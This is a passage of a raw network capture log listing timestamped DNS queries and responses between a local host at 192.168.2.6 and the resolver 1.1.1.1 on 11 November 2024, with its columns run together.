                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.791919947 CET5753853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.792515993 CET5161153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793056011 CET6250153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793256998 CET6161153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793782949 CET5423953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.794481993 CET5781853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795114994 CET5868853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795114994 CET4967453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795332909 CET5630153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795732975 CET5885353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.796230078 CET5784053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.796538115 CET5744153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.796566010 CET53575451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.797636986 CET53646371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.797743082 CET5572453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.797743082 CET6215053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.798877001 CET5665553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.801680088 CET53590061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.802298069 CET5136253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.802678108 CET53516111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.802767038 CET53563011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.803181887 CET53625011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.805553913 CET5646653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.806375980 CET53578181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.806386948 CET53586881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.806397915 CET53588531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.808563948 CET53621501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.808851004 CET53574411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.809286118 CET53566551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.810758114 CET5503253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.810889959 CET5928953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.810983896 CET5388153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.811141014 CET5237453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.813011885 CET53564661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.813178062 CET6519753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.816637039 CET53557241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.818676949 CET53574621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.820497990 CET53592891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.820513964 CET53550321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.821110010 CET53538811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.822571039 CET6182153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.822712898 CET53523741.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.822884083 CET53575381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.824213982 CET5869653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.824417114 CET53651971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.824428082 CET53616111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.825795889 CET53632931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.827249050 CET53542391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.828551054 CET53496741.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.828564882 CET53578401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.829044104 CET5634553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.835665941 CET53513621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.838603973 CET53563451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.841559887 CET53618211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.855859995 CET53586961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.891077995 CET6374653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.891304970 CET6071953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.891304970 CET4921553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.905599117 CET4966753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.905925035 CET6194953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.910798073 CET53492151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.912528038 CET4958853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.912803888 CET4986753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913223028 CET5241353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913480043 CET5400753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913669109 CET5685153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913810968 CET5893053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913934946 CET5748053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.914103985 CET6474353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.914402008 CET6122753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.915688038 CET53619491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.916198015 CET5847953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.916887045 CET5850453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.918284893 CET53496671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.920756102 CET5371553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.920908928 CET5658753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.921113968 CET5828153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.921377897 CET53495881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.922473907 CET53647431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.922626019 CET53637461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.922782898 CET53524131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.922794104 CET53607191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.923537970 CET53540071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.923552036 CET53568511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.923664093 CET53498671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924185991 CET6298553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924339056 CET5761153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924525023 CET5369853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924673080 CET6291453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924767017 CET53589301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924849987 CET53612271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.925576925 CET5571653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.925825119 CET5541553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.926532984 CET6014953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.927221060 CET5953453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.927222013 CET6159453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.927551031 CET5031553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.928200960 CET53584791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.928323984 CET53585041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.929644108 CET53582811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.931513071 CET53537151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.932332039 CET5546953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.932332039 CET5094153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.933039904 CET53574801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.935937881 CET53629141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.936064959 CET53557161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.938730001 CET53615941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.943284988 CET53554691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.945259094 CET6177053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.945724010 CET5299853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.948055029 CET6246553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.953392982 CET53565871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.955266953 CET53629851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.955286026 CET53576111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.955948114 CET53617701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.957012892 CET53536981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.957695961 CET53554151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.958204985 CET53595341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.958395958 CET53624651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.961678028 CET53503151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.961692095 CET53601491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.964258909 CET53509411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.978404999 CET53529981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.155175924 CET5379653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.155508995 CET5522753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.157488108 CET6066153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.157803059 CET5402553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.159032106 CET6264153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.159341097 CET5939653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.162229061 CET5494253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.163660049 CET5022353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.166575909 CET53552271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.166663885 CET53606611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.167819023 CET53540251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.169189930 CET53593961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.179685116 CET5867553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.182977915 CET6533353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.183232069 CET5784053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.183654070 CET5326553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.184726954 CET6479653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.185482025 CET5373053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.185816050 CET5440853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.187880039 CET53537961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.189479113 CET53626411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.189827919 CET5941753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.192081928 CET53549421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.194215059 CET53578401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.194581985 CET53653331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.194704056 CET53502231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.194721937 CET53544081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.194818020 CET53532651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.195554972 CET6049753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.203102112 CET53594171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.204380035 CET53647961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.204651117 CET6364253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.207564116 CET5017553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.208877087 CET6041153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.213505983 CET6005253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.217792988 CET53537301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.218482971 CET53586751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.218996048 CET53501751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.223346949 CET5833353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.224435091 CET53600521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.225126982 CET5356853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.226389885 CET53604971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.232094049 CET53583331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.237584114 CET53636421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.240511894 CET53604111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.246642113 CET5240553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.246670008 CET5776953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.246995926 CET4982053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247319937 CET5032253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247374058 CET6501353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247469902 CET6145053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247606993 CET6184753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247734070 CET6541653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248193979 CET5444853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248210907 CET5354053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248308897 CET4963653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248399019 CET4957653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248588085 CET5504153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248800039 CET5855653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248989105 CET5204853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.251764059 CET6090753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.252176046 CET6259753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.252784967 CET5589153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.254148960 CET6467453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.254878998 CET6018853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.255513906 CET6357653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.256302118 CET6347753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.257287979 CET53585561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258016109 CET53654161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258124113 CET53535681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258737087 CET53498201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258749962 CET53650131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258958101 CET53524051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258981943 CET53550411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.258991957 CET53544481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.259037018 CET53614501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.260401011 CET53503221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.260999918 CET53535401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.265405893 CET53635761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.265758038 CET53558911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.265769005 CET53646741.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.265981913 CET53601881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.267133951 CET53609071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.267891884 CET5158153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.270812988 CET6120453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.278588057 CET53515811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.279575109 CET5782553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.280002117 CET53577691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.280165911 CET5614753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.280550957 CET53612041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.280564070 CET53618471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.280623913 CET53495761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.282130957 CET53496361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.282147884 CET53520481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.284600019 CET53625971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.285737038 CET6382653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.286643028 CET53634771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.286855936 CET5840253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.289969921 CET53561471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.298587084 CET53584021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.303428888 CET6433553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.303714037 CET6486453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.303916931 CET6452553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.305082083 CET6384653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.305301905 CET5238853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.311283112 CET53578251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.313921928 CET53643351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.314414978 CET53638461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.315093994 CET53645251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.318829060 CET53638261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.335661888 CET53523881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.335875034 CET53648641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.346206903 CET6228653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.351659060 CET5108753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.355880022 CET53622861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.356245041 CET5741653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.356313944 CET6022753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.363262892 CET5741853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.363905907 CET53574161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.365959883 CET5058653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.366373062 CET5047953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.366769075 CET53602271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.383600950 CET53510871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.384227991 CET53505861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.389991045 CET6291553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.395282030 CET53574181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.396962881 CET53504791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.407825947 CET53629151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.457942963 CET6207253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.460469961 CET5379153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.465318918 CET6128053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.466861963 CET5237953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.469060898 CET6449853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.470403910 CET5654853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.471019030 CET53537911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.471631050 CET5155453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.472618103 CET6135653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.473427057 CET5703653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.473958015 CET6464253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.474251032 CET5288653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.474555016 CET5501953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.475698948 CET5363053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.476249933 CET53523791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.478059053 CET5604353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.479989052 CET5455653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.480846882 CET53565481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.481086016 CET4919753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.481576920 CET53515541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.482285976 CET53613561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.483350039 CET53570361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.484280109 CET53528861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.485426903 CET53536301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.486112118 CET6551253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.486572981 CET5739353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.487648010 CET4962653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.489270926 CET53620721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.489651918 CET53545561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.491683960 CET53491971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.496400118 CET6342953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.496778965 CET5869553192.168.2.61.1.1.1
